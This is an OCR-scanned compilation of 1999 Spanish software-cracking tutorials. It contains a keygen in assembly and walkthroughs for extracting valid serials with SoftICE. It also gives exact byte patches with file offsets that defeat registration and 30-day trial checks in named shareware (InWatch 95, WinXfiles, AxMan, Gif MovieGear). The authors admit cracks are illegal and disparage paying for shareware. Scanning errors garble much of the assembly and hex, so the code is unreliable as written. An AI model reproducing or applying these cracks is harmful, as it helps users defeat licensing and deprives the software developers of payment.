MsgBoxCaption2 db " Su número:",0 
Buffer db 10 dup(0),0 
Serial_Start dd 3b9aca00h 


. code 


start: 


invoke MessageBox, NULL, addr Mensaje,addr MsgBoxCaption,MB_OK 
invoke GetTickCount 
add [Serial_Start],eax 


Calculo: 

inc [Serial_Start] 
mov eax,Serial_Start 
mov edi,eax 

mov ecx, eax 

mov esi,eax 

shl ecx,14h 

mov edx,eax 

shl esi,10h 

and ecx,0ff£f£00000h 
shr edx,10h 

or esi,edx 

sub edx,edx 

xor esl,ecx 

mov ecx, eax 

shr ecx,0ch 

xor esl,ecx 

mov ecx,2694h 

xor eax,esi 

div ecx 

test edx,edx 

jnz Calculo 

nop 


mov eax,edi ; lo preparo para la Hex a Dec 
mov esi,ofíset Buffer 


add esi,11 
mov byte ptrlesil,00 
dec esi 


; Hex a Dec proporcionado por Mr. Crimson 
mov ecx,00000010 
c20: cmp eax,ecx 

jb c30 

xor edx,edx 

div ecx 

or dl1,30h 

mov byte ptrlesil,dl 
dec esi 

jmp c20 

c30: or al,30h 

mov byte ptrlesil,al 


invoke MessageBox,NULL,ESI,addr MsgBoxCaption2, MB_OK 
invoke ExitProcess, NULL 
end start 


7. Conclusiones finales 
Para terminar veamos a modo de resumen lo que hemos hecho: 


1. Poner bpx en regqueryvalueexa 

2. Encontrar donde lee y guarda nuestro serial 

3. Encontrar la rutina que luego lo lee y lo verifica 

4. Estudiar ese código y ser capaces de crear una clave válida 


He de decir por pen-último, que con posterioridad a todo lo explicado, me he encontrado dos patchers 
en internet para Particle Fire v1.1la, pero ningún keygen, lo cual confirma que lo más fácil es parchear 
bien y no mirar a quien. Asímismo, de los dos parcheadores, uno no funciona (al menos a mí), y el 
otro me parece que no tiene mucho estilo, porque lo que hace es dedicarse a sustituir el inicio de 
todas las cadenas de texto por '00' para evitar que salgan (si recordais, durante el tutorial hemos 
considerado esta opción pero la descarté porque es poco elegante, tediosa, y no sabes hasta que punto 
te garantiza resultados). Aún peor, ese patch sustituye *todas* las cadenas de texto, con lo cual se ha 
cargado no solo los mensajitos shareware si no también la parte de frases aleatorias que forman parte 
del salvapantallas estés registrado o no, y que pueden anularse con una simple casilla del cuadro 
'configurar protector de pantalla", con lo que más que parchear, se ha mutilado el programa 
innecesariamente. 


Ahora sí, por último, pedir disculpas si algo no ha quedado bien explicado, o por los errores que sin 
duda habré cometido, pero puedo asegurar que con este sistema me he librado de los mensajitos no 


deseados. Y, bueno, ahora ya puedo volver a mi antiguo salvapantallas con la cabeza bien alta... 


= Champion = 


Karpoff Spanish Tutor 


Programa: 
InWatch 95 Relase V1.3a 


PROTECCION: Name / Serial 

Descripcion: Programa Para Monitorear el systema, bueno para comprobar los cambios que hacen los 
programas al instalarlos. 

Dificultad: Facilon 

DOWNLOAD : http://members.xoom.com/ XOOM/kf karpoff/Utilidades/Installw.zip 

Herramientas: Softice v3x+, W32Dasm , Editor Hexadecimal 


CRACKER: karpoff FECHA: 11/09/99 


| INTRODUCCION 


HH Tutoríal de Crackeo Para Newbies desde Cero 11/09/99 


Por Karpoff it PROYECTO 9 ¿Hit 


Hola a todos/as !!! Lo primero decir que esto no va ha ser un manual como los 
anteriores, voy a intentar demostraros el poco interés que ponen la mayoría de los 
programadores en proteger su software, y por lo tanto la mierda de software que nos 
quieren meter. Conocéis alguna utilidad con licencia shareware que merezca la pena 
pagar¿? Yo realmente no. 


Siempre que queremos petar un programa los newbies (novatos) pensamos que tiene que 
ser super complicado encontrar el punto donde atacar al programa, generalmente 
queremos petarlo antes de empezar, con lo cual se nos cierra el cerebro y no vemos 
mas halla de nuestra totxa, os aseguro que si os tomáis las cosas con calma y probáis 
a modificar en un programa todo lo que creáis que os puede beneficiar en cuanto a la 
limitación se refiere, podéis flipar, a parte de aprender muchisimo os divertiréis 
viendo como puede llegar a actuar el programa que modifiquéis. 


La víctima InWatch 95 Relase Vl1l.3a parece ser una utilidad para seguir instalaciones, 
pudiendo ver todo lo que se modifico con una instalación tal, y recuperando el estado 
anterior a la instalación. Parece que tiene funciones de editor y algunas cosas mas, ( 
el caso es que no conocía este programa y no he tenido la ocasión de probarlo). Lo 
podéis coger de: 


http: //members.xoom.com/_XOOM/nakarko/inversa/proggies/Installw.zip 


Este es un programa limitado a 30 días, nos arranca con un nag para decirnos que es 
una versión sin registrar y una vez aceptado nos muestra un nuevo nag soltándonos 
otra vez el rollo de su limitación a 30 días. 


Ataques: vamos a sacar con el SoftlIce un numero de registro valido para el nombre que 
metamos, el proceso que voy a utilizar para capturar el S/N no es corriente, se trata 
de que sepáis que se puede crackear sin seguir el típico proceso de buscar la rutina 
de comprobación y a partir de hay comparar el reg falso con el valido. 


Os explico como lo haremos, se trata únicamente de buscar en la memoria el n/s 
valido, porque cuando un programa nos da el mensaje de qu l serial no es valido, en 
ese momento todavía puede estar el reg valido en la memoria, claro esta que para 
mostrar el mensaje de error en algún punto hizo la comprobación, entonces 
rastrearemos la memoria en la ventana de datos del softice en busca del posible n/s. 
este es un método un poco pasota pero os aseguro que con muy buenos resultados, Y con 
el W32dasm convertiremos la ventana donde tenemos que escribir el nombre y el numero 
de registro en un generador de S/N validos, Ósea que meteremos un nombre cualquiera y 
sin meter n/s pulsaremos el botón que era para registrarnos, y nos mostrara el numero 
valido, curioso no¿? 


| AL ATAKE 


PARTE 1 BUSCAR UN S/N VALIDO, DE UNA FORMA POCO USUAL 


Herramientas Softice, W32dasm, HEXedit, primero empezamos con el soft, ousease que hemos 
reiniciado nuestro ordenador y hemos cargado el sofice. Bien primero hacer una copia del 
archivo inwatch.exe para luego editarla con el hexedit, ahora cargamos el original con el 
softice, pulsamos el botón de los engranajes y nos baos al soft, F5 para vover a windows, 
aparece el primer nag, pulsamos OK y aparece el segundo nag pulsamaos OK y entramos en el 
programa vamos a register y pulsamos register now, y ya nos aparece la ventana de registro ( 
que luego la convertiremos en el generador de n/s validos) rellenamos los datos en mi caso 
pondré 


NAME: karpoff 


Regitration Number : 1212121212 


Y ahora tenemos que poner un breakpoint que detenga la ejecución del programa Justo cuando 
este, O aya comparado nuestro numero con el valido, que breakPoint poner¿? En anteriores 
manuales ya explique como saber a que funciones externas llama un programa, en este caso 
utilizamos la función messageboxexa, pues pulsamos [Ctrl+D] para entrar en el softice y 
poner nuestro breakpoint 


BPX messageboxexa 


Pulsamos nuevamente [Ctrl+D] para volver a Windows y pulsamos OK en la ventana del registro, 
inmediatamente el programa llama a la función messageboxexa e interrumpe la ejecución del 
programa llevándonos directamente al softice exactamente en 


USER32 MESSAGEBOXEXA 


015F:BFF52E1C B135 MOV CL,35 


Lógicamente estamos dentro de user32.dll y necesitamos saber quien llamo a esta funcion 
desde inwatch.exe pues nada mas fácil pulsamos F12 y no nos muestra a papa (la rutina padre 
que llamo a messageboxexa) nos saca del softice a windows y nos muestra el mensage de que no 
es correcto nuestro numero, aquí es donde podemos empezar a soñar e imaginar y pensar con 
mucha paz y ciencia, bueno como decía esto ya ha hecho la comprobación y ha decidido que 
somos unos chicos/as malos/as, pero seamos aun peores, lo ultimo que hicimos en el softice 


fue pulsar la tecla F12 para que nos llevase a la rutina padre que había llamado a 
messageboxexa y nos saco a Windows, bueno pues en cuanto pulsemos aceptar en el mensaje de 
error iremos a parar a la rutina padre ya que esa orden todavía no se ha terminado de 
ejecutar en el softice Pulsemos aceptar y entramos al soft en 


:0042B5B2 E8891B0300 Call USER32!!MESSAGEBOXEXA --- LA RUTINA PADRE 


:0042B5B7 57 push edi --- APARECEMOS AQUÍ 


Bueno pues yo sigo pensando que el numero correcto todavía debe de estar en memoria, si 
pulsamos la tecla F2 veréis que en la parte superior del softice nos aparece un nuevo 
apartado con los registros y los valores que llevan actualmente algo así 


EAX=XXXXXXXX ESI=XXXXXXXX ECX=XXXXXXXXX ETC. ETC. ETC. 


Si pulsamos con el botón derecho del ratón sobre cualquier registro (EAX, EDX, EBX, ECX,ESI, 
EDI ETC.) o sobre cualquier dato que veáis se despliega un menú y si escogéis la opción 
DISPLAY veréis que en la ventana de datos ( en la que se muestran los caracteres) se muestra 
lo que lleva la memoria en ese momento, mi idea es ir pulsando en cada registro y rastrear 
la ventana de datos hacia arriba y abajo, Y concretamente si pulsáis sobre ESP y le hacéis 
DISPLAY podéis ver en la ventana de datos y concretamente en la parte superior izquierda el 
numero 15757 claro veréis este numero si como nombre escribisteis karpoff, de haber escrito 
otro nombre veréis otro numero con cinco dígitos, seguramente en otros registros(EDX, EBP, ) 
también encontréis el n/s valido, solo que tendréis que rastrear arriba y abajo no siempre 
aparece a la primera, y en muchos programas este método no será valido.Bueno Pues este era 
nuestro n/s valido, queda entendido no ¿? hay muchas formas de crackear, la limitación la 
ponemos nosotros, echarle imaginación y veréis. 


Los datos del registro se guardan en el archivo C:IWINDOWSX inwatch.INI para hacer el 
siguiente experimento tenéis que desregistraros, con borrar el n/s del archivo inwatch.ini 
ya no estaréis registrados. 


PARTE 2 Convertir la ventana de registro en un generador de S/N validos 


Pues si con una pequeña modificación en solo dos bytes, haremos que la ventana donde metemos 
el nombre y el s/n para registrarnos se convierta en un generador de números validos para el 
programa (curioso no¿?) 


Bueno utilizaremos el W32dasm y un editor HEX, desensamblamos el archivo inwatch.exe y con 
el HEXedit editamos una copia de este mismo archivo, ya hemos desensamblado el archivo, 
sigamos los pasos tipicos buscamos el mensaje de * Incorrect Registration Number." Y hacemos 
doble clip, aparecemos en 


* Possible StringData Ref from Data Obj ->"Incorrect Registration" 


:0042B5A6 6841FB4600 push 0046FB41 


* Possible StringData Ref from Data Obj ->"Incorrect Registration Number." 


:0042B5AB 682CFA4600 push 0046FA2C -— APARECEMOS AQUI 


:0042B5B0 6A00 push 00000000 


echemos un vistazo encima de este código para ver que hace que se imprima este mensaje. 


* Possible StringData Ref from Data Obj ->"shownumber" 


:0042B55F 680DFA4600 push 0046FAOD 


:0042B564 FF75F0 push [ebp-10] 


:0042B567 E8B4900200 call 00454620 


:0042B56C 83C408 add esp, 00000008 


:0042B56F 85C0 test eax, eax 


:0042B571 742A Je 0042B59D — SI NO SALTA GENERA EL S/N 


:0042B573 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Registration Number" 


:0042B575 6818FA4600 push 0046FA18 


:0042B57A 8D45CC lea eax, dword ptr [ebp-34] 


:0042B57D 50 push eax 


:0042B57E FF37 push dword ptr [edi] 


:0042B580 E87C4E0100 call 00440401 


:0042B585 83C410 add esp, 00000010 


:0042B588 FF7720 push [edi+20] 


:0042B58B 8B4720 mov eax, dword ptr [edi+20] 


:0042B58E 8B4008 mov eax, dword ptr [eax+08] 


:0042B591 FF908C000000 call dword ptr [eax+0000008C] 


:0042B597 59 pop ecx 


:0042B598 E9A5000000 jmp 0042B642 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0042B571 (C) 


:0042B59D 3B5DEC cmp ebx, dword ptr [ebp-14] 


:0042B5A0 741E je 0042B5C0 -— SALTO AL MENSAJEE DE ERROR 


:0042B5A2 6A00 push 00000000 


:0042B5A4 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Incorrect Registration" 


:0042B5A6 6841FB4600 push 0046FB41 


* Possible StringData Ref from Data Obj ->"Incorrect Registration Number." 


:0042B5AB 682CFA4600 push 0046FA2C —- APARECEMOS AQUI 


:0042B5B0 6A00 push 00000000 
Bueno ya veis no¿? No voy a enrroyarme, mas bien resumiré, tenemos un salto en 


0042B5A0 si este salto se ejecuta evitaría el mensaje de error, por lo tanto nos registraría 
cualquier numero, para ello tendríamos que cambiar 


0042B5A0 741E je 0042B5C0 por 0042B5A0 EB1E jmp 0042B5C0 


EN realidad esto nos aceptaría el s/n que metamos, incluso nos felicita con el típico Tank 
you for register o similar, pero al iniciar nuevamente el programa vemos que no mantiene el 
registro, que puede pasar, pues que hay otra comprobación o la misma pero llamado desde otro 
punto del programa, en cualquier caso no me centrare en buscarla eso os lo dejo a vosotros 
que esta muy fácil. 


Sigamos en 0042B571 742A je 0042B59D otro salto si os fijáis en la dirección de memoria a la 
que apunta vemos que si salta va directo al salto que hemos analizado antes , pero si lo 
eliminamos haciendo que no salte entra en el código que genera el s/n valido, y cual fue mi 
sorpresa al ver que si eliminas el salto convierte la ventana de registro en un keygen, 
actuando así, metemos un nombre pulsamos ok y en vez de mostrarnos el nag con el aviso de 
registro aceptado o registro fallido nos muestra un nag diciendo su numero de registro es 
tal ( alucinante, nunca vi un programa con este comportamiento) bueno para eliminar el salto 
0042B571 742A Je 0042B59D tendríamos que cambiar los bytes 742A por 9090 solo tenemos que 
ver la dirección del offset e ir al HEXedit Offset 1BB71 cuando realizeis los cambios salvar 
el programa ( que es una copia del original claro) y veréis cuando intentéis registraros.... 


Espero que lo entendáis todo, no me he querido meter en explicaciones profundas por dos 
razones, una por que ya debéis de tener nivel suficiente para llevar a cavo todos estos 
cambios sin las explicaciones detalladas de los anteriores manuales, y dos porque en este 
manual lo que intento es deciros que cualquier forma de crackeo es valida, todo lo que se os 
ocurra vale no os centréis solo en los manuales, buscar nuevos métodos de ataque. 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf_karpofffhotmail.com URL: http://welcome.to/karpoff 


Un Saludo a TODOS/AS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


sobre 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


HH Tutoríal de Crackeo Para Newbies desde Cero 22/09/99 


Por Karpoff Hi GRUPO KF_CRACK KARPOFF-NEW 98/99 HH 


PROYECTO 12 HH 


INTRODUCCION. 


Hello Nuevamente ¡! Tan solo han pasado 2 dias desde el manual n*11, pero este va ha ser un 
manual cortito, quiero que conozcáis una herramienta que muchos no conoceréis, se trata de 
APIS32 V 2.4. Esta herramienta nos puede mostrar las apis que maneja un programa en cada 
momento, ejemplo: estamos con ele SoftlIce intentando sacar el S/N valido de un programa 
pero no encontramos el breakPoint apropiado, que nos capture el proceso de creación y 
comparación del S/N, pues el APIS32 nos puede ayudar, os diré como a la vez que sacamos un 
S/N valido de la ultima versión de WinXfiles V2.4 ( es tan nueva que solo tiene 4 días ) 
este programa es para encriptar todo tipo de archivos, imágenes etc. 


Podéis encontrar APIS32 V 2.4 en mi Web en la sección herramientas, Editores HEX € Utiles 
http://welcome.to/karpoff 


Parte 1 


Este programa WinXfiles hace 3 versiones era tan fácil de crackear como desemsamblarlo y 
parchear un salto, (solo faltaba que en el readme del programa te dijesen donde encontrar 
el je a partchear, creerme que era facilísimo) hoy cuenta con algunas protecciones, el 
código fuente a cambiado, si modificas el programa este se cierra automáticamente, y 
algunas cosillas mas haciendo muy difícil petarlo con listado muerto. 


Lo podéis coger de: 


http://www.pepsoft .com/wxf32 42.zip 


ftp: //ftp.cix.co.uk/mirrors/tucows.com/files3/wxf32 42.zip 


Herramientas: Softlce y APIS32 V 2.4 , Cuento con que tenéis bien configurado el SoftlIce ya 
que en este manual no voy a dar ninguna explicación sobre el tema. 


Comportamiento del programa Tenemos 30 días de evaluación pasado ese tiempo deja de 
funcionar, desconozco si tiene algún tipo de limitación, no muestra ningún nag de arranque, 
tenemos la opción de registrar el programa, si metemos los datos al azar nos saldrá un nag 
diciendo Sorry this number is invalid o algo así, este nag no es del tipo de messageboxa es 
un nag que mas bien parece un icono grande, no emite ningún beep con lo cual nos dificulta 
mas el capturar el proceso mediante el nag. 


Ataque Localizar un S/N valido dependiendo del nombre que metamos, localizaremos el numero 
rastreando los registros ( eax, eilp, ebx etc), ya que el S/N se genera según nuestro nombre 
y en un momento dado se compara con el nuestro, pero mientras ocurren todos etos procesos 
el S/N valido esta en alguna parte de la memoria puesto que ya se ha generado o se esta 
generando, rastrearemos los registros sin liarnos demasido si no encontramos lo que 
queremos enseguida, pasamos a tracear el programa y a ver todo el proceso. Como ya os dije 
en manuales anteriores no tenemos por que seguir unas pautas de crackeo, sino que todo lo 
que se nos pueda ocurrir es perfecto. 


PARTE 2 


A trabajar. Tenemos iniciado Windows con Softlce y APIS32 V 2.4 ya en funcionamiento, el 
aspecto de APIS32 V 2.4 es este. 


ADVAPI32: RegUpenkewá [ HANDLE. LPSTR. LPDATA ] 

ADVAPI32: RegOpenKeyExá [ HANDLE, LPSTR, DWORD, DWORD, LPDATA ] 
ADVAPI32 : RegOpenKeyExw' [ HANDLE, LPWSTR, DWORD, DWORD, LPDATA ] 
ADWAPI32 : RegOpenKeyw [ HANDLE, LPWSTA, LPDATA ] 


: _hread [ HANDLE, LPDATA, DWDRD ] 
: _hwrite [ HANDLE, LPSTR, DW'DRD ] 
¿_lclose [ HANDLE ] 
: _lereat [LPSTR, DWDRD ] 
: _liseek [ HANDLE, DWORD, DWORD ] 

:_lopen (LPSTR, DWORD ] 

: _lread [ HANDLE, LPDA4TA, DWDRD ] 

: _lwrite [ HANDLE, LPSTR, DWORD ] 
KERNEL32: CreateFileá, [LPSTR, DWORD, DWORD, LPDATA, DWDRD, DWORD, HAN 
KERNEL32: CreateFileMappingá [ HANDLE, LPDATA, DWORD, DWORD, DWORD, LPS 
KERNEL32: CreateFilew' [ LPwWSTAR, DWORD, DWORD, LPDA4TA, DWORD, DWORD, H 
KERNEL32 : CreateMailslotá [ LPSTR, DWORD, DWORD, LPDATA ] 


Examining application --- Escoger el programa que vamos a analizar 
Command line arguments --- por si queremos ejecutar el programa con alguna opción 
Follow API functions are spied --- Esta es la lista de funciones Api que nos detectaría en 


el programa a analizar, podemos añadir mas. 


Find ---- Buscar una Función en la lista 


Add --- Añadir mas Funciones tenemos una larga lista para añadir (dependiendo de las 
librerías .dll que utilice el programa pues añadimos)) 


Run ---- Ejecutar el programa que tenemos seleccionado, es muy importante para que nos 
sirva de algo el apis32 ir viendo en que momento de van ejecutando las funciones, que luego 
serán nuestros breakPoints en el soft. 


En nuestro caso cargamos el archivo Wxfile.exe como esta en la foto y pulsamos Run se 
empieza a ejecutar el programa y vemos como van apareciendo las funciones que utiliza, pero 
a nosotros nos interesa las funciones que utiliza cuando nos muestra la ventana de error 
tras intentar registrarnos, Ósea que vamos a WinX Files y pulsamos en el dibujo del cerdo, 
si! donde pone que tenemos 30 dias, nos sale la ventana de registro y rellenamos con lo que 
queramos, en mi caso pondre. 


User Name: karpoff 


Key: 14141414 


Fijaros bien en el apis32 en las funciones que se han ejecutado nos posicionamos en la 
ultima función (con el ratón) y nos preparamos para pulsar OK en la ventana de registro a 
la vez que vemos que función escupe cuando muestre la ventana de que hemos fallado en el 
registro, y la función ha sido CreateWindowExa pues este será nuestro BreakPoint. 
Cerramos todo y cargamos el archivo Wxfile.exe en el Softlce Pulsamos el botón de los 
engranajes nos sale la ventanita pulsamos aceptar y estamos en el softice, ahora tenemos 
que salir para rellenar los datos del registro así que pulsamos F5 o [CTRL+D], devuelta a 
Windows y con WinXfiles ejecutado , nada pues a rellenar con los datos anteriores y 
atención ahora tenemos que ponemos nuestro BreakPoint, pulsamos [CTRL+D] y de nuevo en el 
softice a poner el BP 

BPX createwindowexa 

Tenemos que volver al windows para pulsar OK en los datos del registro, ósea que de nuevo 
F5 o [CTRL+D], y cuando salgamos a Windows pulsamos OK en los datos y haber si hace efecto 
la función createwindowexa EXPLACHSSSS estamos en el Softlce concretamente en. 


USER32 ! CREATEWINDOWEXA 
015F:BFF55C65 B530.  --=---- AQUÍ 


Como veis si miráis la parte inferior derecha del softice veréis que nos encontramos dentro 
de la librería de Windows USER32.DLL a la cual Wxfile.exe a hecho una llamada a la función 
createwindowexa tenemos que saber que parte del código de nuestra víctima llamo a esta 
función pulsamos F12 y EXPLACHSSSS aparecemos en la rutina padre. 


015F:00416B99 ES66EAFEFF Call USER32!CREATEWINDOWEXA -— LLAMADA A LA FUNCION 
015F:00416B9E 8986C0000000 mov dword ptr [esi+000000C0], eax - ESTAMOS Aquí 


hemos dicho que intentaremos localizar el S/N valido rastreando los registros no¿? Bueno 
pues pulsar la tecla F2 y aparecen en la parte superior del SoftIice los registros con sus 
valores, ahora posamos el ratón sobre cualquiera de ellos por ejemplo EAX y pulsamos el 
botón derecho, se despliega un menú de opciones escogemos Display y rastreamos la ventana 
de datos ( la ventanita donde están los datos en caracteres) con las flechitas de 
movimiento de la ventana miramos hacia arriba y hacia abajo fijándonos en todo, atención 
pero rastreamos cada registro un poquitin para arriba y lo mismo hacia abajo, no os tiréis 
la de dios de tiempo, si no veis nada interesante al siguiente registro y hacéis lo mismo. 


Prestar especial atención si veis números o un cacho del nombre que metisteis entonces lo 
miráis mas detenidamente. Bueno y cuando llegueis a ESI y miréis un pelin hacia arriba 
veréis 3 códigos uno el [nuestro] otro compuesto por [letras, números y un par de 
Caracteres] y el ultimo todo [letras mayúsculas] apuntarlos y a probar. 

En efecto la clave es 


NAME: karpoff 
KEY: CERKTEFVUNQOJPHN 


Era lógico pensar que el código valido eran las 15 letras mayúsculas, ya 


que el otro código contenía un par de caracteres (! Que no suelen ser 
corrientes. 

Habéis visto lo fácil que puede ser encontrar un S/N sin seguir todos los 
procesos, cuando tengáis un programa para crackear hecharle imaginación 
crackear tiene que ser algo divertido. 

Llegados al n*12 de esta serie de manuales, me gustaría que me mandaseis 
sugerencias sobre como queréis que siga avanzando esto, si queréis 
proyectos con el Softlce o empezar con el SmartCheck (como el Softlce pero 
para visual basic) o manuales sobre como funcionan algunas herramientas de 
cracking. Lo dejo en vuestras manos. 

Un saludo para todos en especial los que me habeis participado activamente 
con sugerencias preguntas etc, 


Pues esto es todo. Que os a parecido.. interesante no¿? Como siempre mi mayor deseo es que 
entendáis esto como yo intento explicarlo. Es difícil escribir manuales creerme, pero 
mientras una sola persona los lea seguiré J 


Con cualquier duda mandarme un email, contesto a todos los email. 


Un saludo para todos/as (karpoff) 


Kf karpofffthotmail.com 


http://personal2.redestb.es/karpoff 


http://welcome.to/karpoff 


El uso de este material es solo para uso educativo, por ahora los cracks 
son ilegales cada cual es responsable del uso que le de a este tutorial, el 
autor no se hace responsable de nada. 


Tutorial Descargado de 


Protecciones Estupidas 


| Programa Axman v3.01 | W95 / WNT 
| Descripción Compresor 


Have you ever downloaded a program that 
you wanted to make a backup copy of only 
to realize that it was too large to fit onto a 
single floppy disk? Have you ever tried to 
email someone a large program only to have 
it not get there because of restrications that 
certain email servers make on the size of 
emails? Have you ever wanted to distibute 
files from your internet site but they are so 
large that people get frustrated trying to 
download them, having their connections 
lost and being forced to start over? 


Palabras del 
Autor 


If you answered yes to any of the questions 
above, then AxMan is the program for you! 


AxMan is a 32-bit windows application that 
will split any file into pieces. These pieces 
can then be later restored to recover the 
original file. 


| Ranking 154 1£SS 1544 15ód pay 


| Tipo Trial de 30 dias 
Url ¡ht ://Www.mosaicware.com 


| Protección Time Limit 30 Dias,Numero de Serie 


| Dificultad FA 


A v4.01, W32dasm v8.9, UltraEdit 
Herramientas 
v6.20b 
Objetivo Simular estar registrados,Encontrar el 
zerial 


| Cracker KOLGADO 
E Fecha 17 de Octubre de 1999 


Introduccion: 


He particionado este ¿¿tutorial??? en tres partes. 
*Primera Parte <con parche> 

“Segunda Parte<en ejecucion o sin parche> 

“Tercera Parte<Encontrando el Zeriall> (recomendado) 


Al Atake: 


Primera Parte 

Hacemos todo el proceso de desensamblado y luego buscamos en el string 
reference. Vemos unos cuantos interesantes(expired,invalid info,etc) .Las maneras 
de crackearlo son son practicamente infinitas,pero le daremos al "thank you 
for...'',doble click y alla vamos: 


:00406AAC 84C0 test al, al 
:00406AAE 6A30 push 00000030 
:00406AB0 7513 jne 00406AC5 


Possible StringData Ref from Data Obj ->"AxMan - Error 400" 
:00406AB2 688C084600 push 0046088C 
Possible StringData Ref from Data Obj ->"'Invalid Registration Information" 


:00406AB7 6868084600 push 00460868 
:00406ABC SBCE mov ecx, esi 
:00406ABE ESE67F0200 call 0042EAA9 
:00406AC3 EB7A jmp 00406B3F 


Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
:00406AB0(C) 

Possible StringData Ref from Data Obj ->"AxMan" 

:00406AC5 686C034600 push 0046036C 


Possible StringData Ref from Data Obj ->"Thank you for registering your 
copy of AxMan" 


:00406ACA 6838084600 push 00460838--..------ > AQUI APARECEMOS. 


:00406A CF SBCE mov ecx, esi 
:00406AD1 ESD37F0200 call 0042 EAA9 
:00406AD6 ESB8A70200 call 00431293 


Un poco mas arriba esta el "invalid info", o sea que tenemos las dos caras de la 
moneda practicamente juntos, todavia un poco mas arriba un jne, doble click 
sobre el 

Jump to y nos lleva al "thank you...'' o sea q' en la linea :00406AB0 7513 jne 
00406ACS5, cambiar el 7513 por eb13 y el programa is cracked.Facil verdad. 


Segunda Parte(softice) 


Si eso te parecio muy facil o por si alguna obscura razon no tienes el w32dasm,aca 
va otra opcion igual de facil. 

En el programa, Help/Register....ponemos lo que se nos ocurra, bpx 
getdlgitemtexta,x,no pasa nada,probamos otro,bpx getwindowtextA,x, y ahora si, 
estamos adentro,F10 maniaticamente hata que nos salte la ventana "Invalid Info”, 
le damosok y estamos de vuelta en el soft nos vamos pa arriba hasta encontrar el 
jnz 

00406ac5,creo que no hace falta decir que hacer en esta situacion, o si??, 
simplemente poner un bc * y despues doble click en la linea del jnz que 
mencionamos 

hace un rato(pa poner un bpx).Correr de nuevo el programa y nos para, vemos 
que 

al lado dice no jump; ponemos r fl z y listo. 


Tercera Parte 


Pero todavia hay mas, tambien podemos conseguir el verdadero serial.Repetimos 
el 

proceso de ariba,pero en vez de poner el bpx en jnz lo ponemos en call que esta un 
poco mas arriba en 00406437 una vez alli FS para entrar en el llamado, 11 veces 
F10 

y tnemos Lea eax [esp+08],F10 una vez mas,ahora D eax y vemos 309-621-810.S1 
eso no es un serial q' me parta un rayo jeje... 

PD:El serial es valido para el nombre=danz,Company=my self, si introduces otros 
datos tendras un serial diferente. 

Saludos. 

FEELFREE-KOLGADO 


Karpoff Spanis 
Tutorial Descargado de o 


POST-MORTEM 


CRACKING 


"I "ILOVE THE DEAD" | THE DEAD" 


Ez Programa Gif MovieGear | eS ed aa ¿ 


| Descripción | Descripción [Animacion 


Ra PRO R 
| Tipo Trial de 30 dias,Serial 

Url http://www.gamani.com 
| Protección Time Limit 30 Dias,Numero de Serie 


| Dificultad Fa 
a v4.01, W32dasm v8.9, UltraEdit 
Herramientas 
v6.20b 
[Objetivo [Objetivo Simular estar registrados. estar ¡Simular estar registrados. 


| Cracker KOLGADO 
| Fecha 15 de Octubre de 1999 


Al Atake: 

Abrimos el programa en w32dasm,click en String Reference y buscamos por algo 
positivo,encontramos el "Expired trial version" le damos doble click i aparecemos 
aqui: 


:0042C571 C7053B8F8450000000000 mov dword ptr [0045F8B8], 00000000 
:0042C57B 85FF test edi, edi 

:0042C57D 7357 ¡ne 0042C5D6 

:0042C57F 6A30 push 00000030 


* Reference To: USER32.MessageBeep, Ord:01BDh 
:0042C581 FF1564144400 Call dword ptr [00441464] 


* Possible Reference to String Resource ID=40214: "Expired Trial Version" 


:0042C587 68169D0000 push 00009D16 --->"Aparecemos aqui" 
:0042C58C ES2FFFFDFF call 0040C4C0 


:0042C591 83C404 add esp, 00000004 


Notamos que un poco mas arriba esta un jne,le damos doble click y luego el boton 
jump to y nos lleva aqui: 


* Possible Reference to String Resource ID=40217: "Trial Version Reminder" 


:0042C5D6 68199D0000 push 00009D19-------- >'"Aqui" 
:0042C5DB ESEOFEFDFF call 0040C4C0 

:0042C5E0 83C404 add esp, 00000004 

:0042C5E3 50 push eax 

:0042C5E4 56 push esi 


* Reference To: USER32.SetWindowTextA, Ord:025Eh 


| 
:0042C5E5 FF1530144400 Call dword ptr [00441430] 
:0042C5EB 57 push edi 


* Possible Reference to String Resource ID=40218: ''Reminder: There are %d 
days remaining in your 30 day trial p" 


:0042C5EC 681A9D0000 push 00009D1A 
:0042C5F1 ESCAFEFDFF call 0040C4C0 
:0042C5F6 83C404 add esp, 00000004 


"Trial version reminder'' Hmmmm...si no me equivoco parece ser la rutina de 
habilitacion del programa. 

Cuando nos pasemos los 30 dias no va a hacer el salto y nos aparecera que 
debemos registrarnos para seguir usandolo,por lo tanto, 

cambiemos el salto condicional por uno incondicional. 

Le damos return el w32dasm para volver del salto,ahora nos fijamos en el offset. 
Abrimos nuestro hex editor favorito(en mi caso uedit32) en el offset 0002c57d(en 
mi pc,esto puede variar),cambiar el 75 por eb.La proteccion 

del trial ha sido deshabilitada. 


Ahora bien,el programa esta crackeado, pero al darle en help/about....obviamente 
nos sale el unregistered version,solo para ser un poco mas exquisitos y "limpiar" 
mas el programa 

vamos a hacer que se cambie este mensaje por "Registered version". 

En el string reference,buscamos "Registered version" ,doble click sobre ella y nos 
lleva aqui: 


:0040C11F 83F801 cmp eax, 00000001 
:0040C122 0F35E0000000 ¡ne 0040C208--------- >cambiar por nop 


:0040C128 8D8424B0000000 lea eax, dword ptr [esp+000000B0] 
:0040C13A 830408 add esp, 00000008 

:0040C13D 85CO0 test eax, eax 

:0040C13F 7547 jne 0040C188---->cambiar por nop 


* Possible StringData Ref from Data Obj ->"Registered Version" 


:0040C141 68F0454400 push 004445F0---------- >'"Aqui" 
:0040C146 689F040000 push 0000049F 

:0040C14B 56 push esi 

:0040C14C FFDS call ebp 

:0040C14E 6A00 push 00000000 

:0040C150 6840040000 push 000004A0 

:0040C155 56 push esi 

:0040C156 FFD7 call edi 


Inmediatamente arriba aparece un jne y un poco mas arriba otro. 

Podemos cambiar estos por nop para que el programa no salte.En nuestro hex 
cambiamos 

el 7547 por 9090 y el 0£35e0000000 cambiar por 909090909090.0k guardamos los 
cambios,en el programa le damos help/about.... 


Ahora solo nos falta el nagscreen del principio,vamos a usar el softice ahora para 
detectar que funcion genera la nag. 

Bpx CreateDialogBox,abrimos el programa y nada..,easy, no pasa naa,probemos 
